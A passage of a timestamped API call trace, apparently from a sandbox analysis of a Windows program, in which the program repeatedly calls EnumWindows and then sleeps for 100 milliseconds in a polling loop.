(lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.794] Sleep (dwMilliseconds=0x64) [0136.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.796] Sleep (dwMilliseconds=0x64) [0136.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.797] Sleep (dwMilliseconds=0x64) [0136.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.799] Sleep (dwMilliseconds=0x64) [0136.801] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.801] Sleep (dwMilliseconds=0x64) [0136.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.803] Sleep (dwMilliseconds=0x64) [0136.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.804] Sleep (dwMilliseconds=0x64) [0136.806] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.807] Sleep (dwMilliseconds=0x64) [0136.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.814] Sleep (dwMilliseconds=0x64) [0136.816] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.816] Sleep (dwMilliseconds=0x64) [0136.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.818] Sleep (dwMilliseconds=0x64) [0136.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.820] Sleep (dwMilliseconds=0x64) [0136.822] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.822] Sleep (dwMilliseconds=0x64) [0136.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.824] Sleep (dwMilliseconds=0x64) [0136.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.826] Sleep (dwMilliseconds=0x64) [0136.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.828] Sleep (dwMilliseconds=0x64) [0136.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.831] Sleep (dwMilliseconds=0x64) [0136.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.832] Sleep (dwMilliseconds=0x64) [0136.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.834] Sleep (dwMilliseconds=0x64) [0136.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.836] Sleep (dwMilliseconds=0x64) [0136.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.838] Sleep (dwMilliseconds=0x64) [0136.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.840] Sleep (dwMilliseconds=0x64) [0136.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.842] Sleep (dwMilliseconds=0x64) [0136.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.843] Sleep (dwMilliseconds=0x64) [0136.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.845] Sleep (dwMilliseconds=0x64) [0136.847] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.847] Sleep (dwMilliseconds=0x64) [0136.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.849] Sleep (dwMilliseconds=0x64) [0136.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.851] Sleep (dwMilliseconds=0x64) [0136.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.852] Sleep (dwMilliseconds=0x64) [0136.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.858] Sleep (dwMilliseconds=0x64) [0136.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.860] Sleep (dwMilliseconds=0x64) [0136.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.867] Sleep (dwMilliseconds=0x64) [0136.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.868] Sleep (dwMilliseconds=0x64) [0136.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.870] Sleep (dwMilliseconds=0x64) [0136.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.871] Sleep (dwMilliseconds=0x64) [0136.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.873] Sleep (dwMilliseconds=0x64) [0136.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.875] Sleep (dwMilliseconds=0x64) [0136.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.876] Sleep (dwMilliseconds=0x64) [0136.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.878] Sleep (dwMilliseconds=0x64) [0136.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.881] Sleep (dwMilliseconds=0x64) [0136.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.883] Sleep (dwMilliseconds=0x64) [0136.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.884] Sleep (dwMilliseconds=0x64) [0136.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.886] Sleep (dwMilliseconds=0x64) [0136.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.888] Sleep (dwMilliseconds=0x64) [0136.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.890] Sleep (dwMilliseconds=0x64) [0136.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.892] Sleep (dwMilliseconds=0x64) [0136.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.893] Sleep (dwMilliseconds=0x64) [0136.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.895] Sleep (dwMilliseconds=0x64) [0136.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.897] Sleep (dwMilliseconds=0x64) [0136.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.899] Sleep (dwMilliseconds=0x64) [0136.901] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.901] Sleep (dwMilliseconds=0x64) [0136.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.903] Sleep (dwMilliseconds=0x64) [0136.904] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.904] Sleep (dwMilliseconds=0x64) [0136.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.906] Sleep (dwMilliseconds=0x64) [0136.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.907] Sleep (dwMilliseconds=0x64) [0136.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.909] Sleep (dwMilliseconds=0x64) [0136.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.910] Sleep (dwMilliseconds=0x64) [0136.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.914] Sleep (dwMilliseconds=0x64) [0136.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.916] Sleep (dwMilliseconds=0x64) [0136.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.917] Sleep (dwMilliseconds=0x64) [0136.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.919] Sleep (dwMilliseconds=0x64) [0136.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.920] Sleep (dwMilliseconds=0x64) [0136.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.922] Sleep (dwMilliseconds=0x64) [0136.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.923] Sleep (dwMilliseconds=0x64) [0136.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.925] Sleep (dwMilliseconds=0x64) [0136.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.927] Sleep (dwMilliseconds=0x64) [0136.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.928] Sleep (dwMilliseconds=0x64) [0136.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.930] Sleep (dwMilliseconds=0x64) [0136.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.931] Sleep (dwMilliseconds=0x64) [0136.933] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.933] Sleep (dwMilliseconds=0x64) [0136.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.935] Sleep (dwMilliseconds=0x64) [0136.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.936] Sleep (dwMilliseconds=0x64) [0136.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.938] Sleep (dwMilliseconds=0x64) [0136.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.939] Sleep (dwMilliseconds=0x64) [0136.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.941] Sleep (dwMilliseconds=0x64) [0136.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.942] Sleep (dwMilliseconds=0x64) [0136.943] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.944] Sleep (dwMilliseconds=0x64) [0136.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.945] Sleep (dwMilliseconds=0x64) [0136.946] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.947] Sleep (dwMilliseconds=0x64) [0136.948] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.948] Sleep (dwMilliseconds=0x64) [0136.949] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.950] Sleep (dwMilliseconds=0x64) [0136.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.951] Sleep (dwMilliseconds=0x64) [0136.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.953] Sleep (dwMilliseconds=0x64) [0136.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.955] Sleep (dwMilliseconds=0x64) [0136.956] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.956] Sleep (dwMilliseconds=0x64) [0136.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.981] Sleep (dwMilliseconds=0x64) [0136.984] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.984] Sleep (dwMilliseconds=0x64) [0136.986] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.986] Sleep (dwMilliseconds=0x64) [0136.988] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.988] Sleep (dwMilliseconds=0x64) [0136.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.989] Sleep (dwMilliseconds=0x64) [0136.991] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.991] Sleep (dwMilliseconds=0x64) [0136.993] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.993] Sleep (dwMilliseconds=0x64) [0136.994] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.994] Sleep (dwMilliseconds=0x64) [0136.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.997] Sleep (dwMilliseconds=0x64) [0136.999] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.999] Sleep (dwMilliseconds=0x64) [0137.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.001] Sleep (dwMilliseconds=0x64) [0137.003] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.003] Sleep (dwMilliseconds=0x64) [0137.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.004] Sleep (dwMilliseconds=0x64) [0137.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.006] Sleep (dwMilliseconds=0x64) [0137.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.010] Sleep (dwMilliseconds=0x64) [0137.011] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.011] Sleep (dwMilliseconds=0x64) [0137.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.013] Sleep (dwMilliseconds=0x64) [0137.014] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.014] Sleep (dwMilliseconds=0x64) [0137.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.016] Sleep (dwMilliseconds=0x64) [0137.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.018] Sleep (dwMilliseconds=0x64) [0137.020] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.020] Sleep (dwMilliseconds=0x64) [0137.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.024] Sleep (dwMilliseconds=0x64) [0137.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.025] Sleep (dwMilliseconds=0x64) [0137.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.027] Sleep (dwMilliseconds=0x64) [0137.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.028] Sleep (dwMilliseconds=0x64) [0137.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.050] Sleep (dwMilliseconds=0x64) [0137.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.052] Sleep (dwMilliseconds=0x64) [0137.054] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.054] Sleep (dwMilliseconds=0x64) [0137.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.057] Sleep (dwMilliseconds=0x64) [0137.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.058] Sleep (dwMilliseconds=0x64) [0137.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.069] Sleep (dwMilliseconds=0x64) [0137.071] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.071] Sleep (dwMilliseconds=0x64) [0137.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.073] Sleep (dwMilliseconds=0x64) [0137.074] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.074] Sleep (dwMilliseconds=0x64) [0137.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.076] Sleep (dwMilliseconds=0x64) [0137.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.078] Sleep (dwMilliseconds=0x64) [0137.079] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.080] Sleep (dwMilliseconds=0x64) [0137.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.082] Sleep (dwMilliseconds=0x64) [0137.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.083] Sleep (dwMilliseconds=0x64) [0137.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.085] Sleep (dwMilliseconds=0x64) [0137.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.087] Sleep (dwMilliseconds=0x64) [0137.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.090] Sleep (dwMilliseconds=0x64) [0137.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.092] Sleep (dwMilliseconds=0x64) [0137.093] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.094] Sleep (dwMilliseconds=0x64) [0137.095] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.096] Sleep (dwMilliseconds=0x64) [0137.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.097] Sleep (dwMilliseconds=0x64) [0137.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.099] Sleep (dwMilliseconds=0x64) [0137.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.101] Sleep (dwMilliseconds=0x64) [0137.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.103] Sleep (dwMilliseconds=0x64) [0137.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.105] Sleep (dwMilliseconds=0x64) [0137.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.106] Sleep (dwMilliseconds=0x64) [0137.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.111] Sleep (dwMilliseconds=0x64) [0137.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.112] Sleep (dwMilliseconds=0x64) [0137.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.114] Sleep (dwMilliseconds=0x64) [0137.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.115] Sleep (dwMilliseconds=0x64) [0137.117] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.117] Sleep (dwMilliseconds=0x64) [0137.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.119] Sleep (dwMilliseconds=0x64) [0137.121] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.121] Sleep (dwMilliseconds=0x64) [0137.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.123] Sleep (dwMilliseconds=0x64) [0137.124] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.124] Sleep (dwMilliseconds=0x64) [0137.126] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.126] Sleep (dwMilliseconds=0x64) [0137.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.132] Sleep (dwMilliseconds=0x64) [0137.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.134] Sleep (dwMilliseconds=0x64) [0137.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.135] Sleep (dwMilliseconds=0x64) [0137.137] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.137] Sleep (dwMilliseconds=0x64) [0137.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.139] Sleep (dwMilliseconds=0x64) [0137.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.141] Sleep (dwMilliseconds=0x64) [0137.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.142] Sleep (dwMilliseconds=0x64) [0137.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.144] Sleep (dwMilliseconds=0x64) [0137.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.146] Sleep (dwMilliseconds=0x64) [0137.147] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.147] Sleep (dwMilliseconds=0x64) [0137.150] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.150] Sleep (dwMilliseconds=0x64) [0137.152] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.153] Sleep (dwMilliseconds=0x64) [0137.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.154] Sleep (dwMilliseconds=0x64) [0137.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.156] Sleep (dwMilliseconds=0x64) [0137.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.158] Sleep (dwMilliseconds=0x64) [0137.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.159] Sleep (dwMilliseconds=0x64) [0137.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.161] Sleep (dwMilliseconds=0x64) [0137.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.162] Sleep (dwMilliseconds=0x64) [0137.163] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.164] Sleep (dwMilliseconds=0x64) [0137.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.165] Sleep (dwMilliseconds=0x64) [0137.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.167] Sleep (dwMilliseconds=0x64) [0137.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.215] Sleep (dwMilliseconds=0x64) [0137.216] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.217] Sleep (dwMilliseconds=0x64) [0137.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.221] Sleep (dwMilliseconds=0x64) [0137.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.223] Sleep (dwMilliseconds=0x64) [0137.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.225] Sleep (dwMilliseconds=0x64) [0137.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.227] Sleep (dwMilliseconds=0x64) [0137.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.230] Sleep (dwMilliseconds=0x64) [0137.231] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.231] Sleep (dwMilliseconds=0x64) [0137.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.233] Sleep (dwMilliseconds=0x64) [0137.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0137.235] Sleep (dwMilliseconds=0x64) [0137.299] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0138.527] Sleep (dwMilliseconds=0x64) [0141.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0141.108] Sleep (dwMilliseconds=0x64) [0142.041] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0142.041] Sleep (dwMilliseconds=0x64) [0142.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0142.644] Sleep (dwMilliseconds=0x64) [0143.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0143.269] Sleep (dwMilliseconds=0x64) [0143.380] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0143.381] Sleep (dwMilliseconds=0x64) [0143.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0143.609] Sleep (dwMilliseconds=0x64) [0143.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0143.976] Sleep (dwMilliseconds=0x64) [0144.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0144.241] Sleep (dwMilliseconds=0x64) [0144.374] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0144.374] Sleep (dwMilliseconds=0x64) [0144.522] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0144.523] Sleep (dwMilliseconds=0x64) [0144.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0144.741] Sleep (dwMilliseconds=0x64) [0145.231] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.237] Sleep (dwMilliseconds=0x64) [0145.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.319] Sleep (dwMilliseconds=0x64) [0145.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.353] Sleep (dwMilliseconds=0x64) [0145.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.403] Sleep (dwMilliseconds=0x64) [0145.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.521] Sleep (dwMilliseconds=0x64) [0145.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.594] Sleep (dwMilliseconds=0x64) [0145.641] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.642] Sleep (dwMilliseconds=0x64) [0145.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.646] Sleep (dwMilliseconds=0x64) [0145.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.651] Sleep (dwMilliseconds=0x64) [0145.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.666] Sleep (dwMilliseconds=0x64) [0145.668] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.668] Sleep (dwMilliseconds=0x64) [0145.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.670] Sleep (dwMilliseconds=0x64) [0145.683] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.683] Sleep (dwMilliseconds=0x64) [0145.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.706] Sleep (dwMilliseconds=0x64) [0145.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.708] Sleep (dwMilliseconds=0x64) [0145.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.751] Sleep (dwMilliseconds=0x64) [0145.816] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.816] Sleep (dwMilliseconds=0x64) [0145.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.852] Sleep (dwMilliseconds=0x64) [0145.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.868] Sleep (dwMilliseconds=0x64) [0145.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0145.983] Sleep (dwMilliseconds=0x64) [0146.158] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0146.492] Sleep (dwMilliseconds=0x64) [0146.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0146.666] Sleep (dwMilliseconds=0x64) [0146.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0146.745] Sleep (dwMilliseconds=0x64) [0146.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0146.940] Sleep (dwMilliseconds=0x64) [0147.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.077] Sleep (dwMilliseconds=0x64) [0147.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.087] Sleep (dwMilliseconds=0x64) [0147.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.089] Sleep (dwMilliseconds=0x64) [0147.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.092] Sleep (dwMilliseconds=0x64) [0147.093] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.094] Sleep (dwMilliseconds=0x64) [0147.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.097] Sleep (dwMilliseconds=0x64) [0147.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.100] Sleep (dwMilliseconds=0x64) [0147.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.105] Sleep (dwMilliseconds=0x64) [0147.107] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.107] Sleep (dwMilliseconds=0x64) [0147.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.109] Sleep (dwMilliseconds=0x64) [0147.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.110] Sleep (dwMilliseconds=0x64) [0147.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.112] Sleep (dwMilliseconds=0x64) [0147.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.114] Sleep (dwMilliseconds=0x64) [0147.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.116] Sleep (dwMilliseconds=0x64) [0147.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.118] Sleep (dwMilliseconds=0x64) [0147.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.119] Sleep (dwMilliseconds=0x64) [0147.121] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.121] Sleep (dwMilliseconds=0x64) [0147.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.123] Sleep (dwMilliseconds=0x64) [0147.124] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.124] Sleep (dwMilliseconds=0x64) [0147.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.125] Sleep (dwMilliseconds=0x64) [0147.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.127] Sleep (dwMilliseconds=0x64) [0147.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.129] Sleep (dwMilliseconds=0x64) [0147.130] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.130] Sleep (dwMilliseconds=0x64) [0147.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.170] Sleep (dwMilliseconds=0x64) [0147.171] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0147.171] Sleep (dwMilliseconds=0x64) [0147.172] EnumWindows 